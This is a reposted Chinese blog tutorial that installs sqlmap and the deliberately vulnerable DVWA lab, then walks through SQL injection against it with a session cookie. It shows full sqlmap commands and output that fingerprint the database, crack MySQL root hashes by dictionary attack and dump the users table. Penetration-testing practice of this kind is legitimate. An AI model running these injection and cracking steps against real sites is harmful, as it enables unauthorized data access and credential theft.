码上快乐

相关内容   简体   繁体

【sql注入破解密码】测试

本文转载自  查看原文  2018-11-22 10:25  679    apache应用/ 安全 端口 
yum install python -y
python -V

tar zxvf sqlmapproject-sqlmap-1.2.11-13-gabb911d.tar.gz


cd sqlmapproject-sqlmap-abb911d/
sqlmapproject-sqlmap-7eab1bc]# ls
doc lib procs shell sqlmap.conf tamper txt waf
extra plugins README.md sqlmapapi.py sqlmap.py thirdparty udf xml

 

3、运行sqlmap

[root@localhost sqlmapproject-sqlmap-abb911d]# ./sqlmap.py

 


4、创建一个slqmap软件链接

ln -s /root/sqlmapproject-sqlmap-abb911d/sqlmap.py /usr/bin/sqlmap

 


sqlmap -h #可以弹出帮助信息,说明安装成了

5.安装网站程序

yum install -y httpd php php-mysql php-gd mariadb-server mariadb mysql

systemctl start httpd && systemctl enable httpd
systemctl start mariadb && systemctl enable mariadb

 

3、测试LAMP环境:
[root@xuegod63 ~]# vim /var/www/html/test.php

<?php
phpinfo();
?>

 

http://45.115.243.24/index.php

4、配置mysql数据root用户密码:

mysqladmin -u root password "123456"
mysql -u root -p123456

 

5、将下载的dvwa渗透系统代码上传到Linux上,并解压到网站根目录下

unzip -d /var/www/html/ DVWA-master.zip
ls /var/www/html/
DVWA-master test.php
chown apache:apache /var/www/html/DVWA-master/ -R

 

 

6、编辑DVAW配置文件/dvwa/config/config.inc.php,配置数据库信息,user和password是MySQL的用户名和密码。

vi /var/www/html/DVWA-master/config/config.inc.php.dist


vi /var/www/html/DVWA-master/config/config.inc.php 修改的地方如下:
$_DVWA[ 'db_server' ] = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = '123456'; #只需要修改成你的mysql的root用户密码

cp  /var/www/html/DVWA-master/config/config.inc.php.dist  /var/www/html/DVWA-master/config/config.inc.php
http://45.115.243.24/DVWA-master/setup.php


报错修改
vi /etc/php.ini
改:815 allow_url_include = Off
为: allow_url_include = On
systemctl restart httpd

 

[root@xuegod63 ~]# vi /var/www/html/DVWA-master/config/config.inc.php
改:
26 $_DVWA[ 'recaptcha_public_key' ] = '';
27 $_DVWA[ 'recaptcha_private_key' ] = '';
为:
$_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';


http://45.115.243.24/DVWA-master/login.php

admin和password

 

 

注入

sqlmap -h

http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#

 

o6fb5ftgc8baogcra5u8786571

low

sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -b --current-db --current-user

 

Y #已经识别出来为mysql,现在直接跳过,不再扫描其他类型的数据库

n #这里写n 如果有想测试一些mysql其他值,就先Y,写Y测试时间比较长。
GET parameter[y/N]N


web server operating system: Linux CentOS 7-1708
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '5.5.60-MariaDB'
[20:17:55] [INFO] fetching current user
current user: 'root@localhost'
[20:17:55] [INFO] fetching current database
current database: 'dvwa'
[20:17:55] [INFO] fetched data logged to text files under '/root/.sqlmap/output/45.115.243.24'

sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -b --string="Surname" --users --password

 

每行弹出的含意:
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]y
temporary [ˈtemprəri] 临时的
eventual [ɪˈventʃuəl] 最终发生的

do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y 基于字典的攻击取回密码哈希值?

[1] default dictionary file '/root/sqlmapproject-sqlmap-abb911d/txt/wordlist.zip' (press Enter) #回车

[20:29:58] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[20:30:01] [INFO] starting dictionary-based cracking (mysql_passwd)
[20:30:01] [INFO] starting 8 processes
[20:30:01] [INFO] cracked password '123456' for user 'root'
database management system users password hashes:
[*] root [2]:
password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
clear-text password: 123456

sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -D dvwa --tables

 

sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -D dvwa -T users --columns

 

sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -D dvwa -T users -C user,password --dump

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 通过BurpSuite和sqlmap配合对dvwa进行sql注入测试和用户名密码暴力破解 linux破解密码 如何利用kali破解密码 nnexus3 破解密码 3 破解密码,xshell连接 mysql修改和破解密码 hashcat破解密码实例 linux系统破解密码。 Mysql 8.0破解密码 MySQL忘记密码破解密码的方法
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM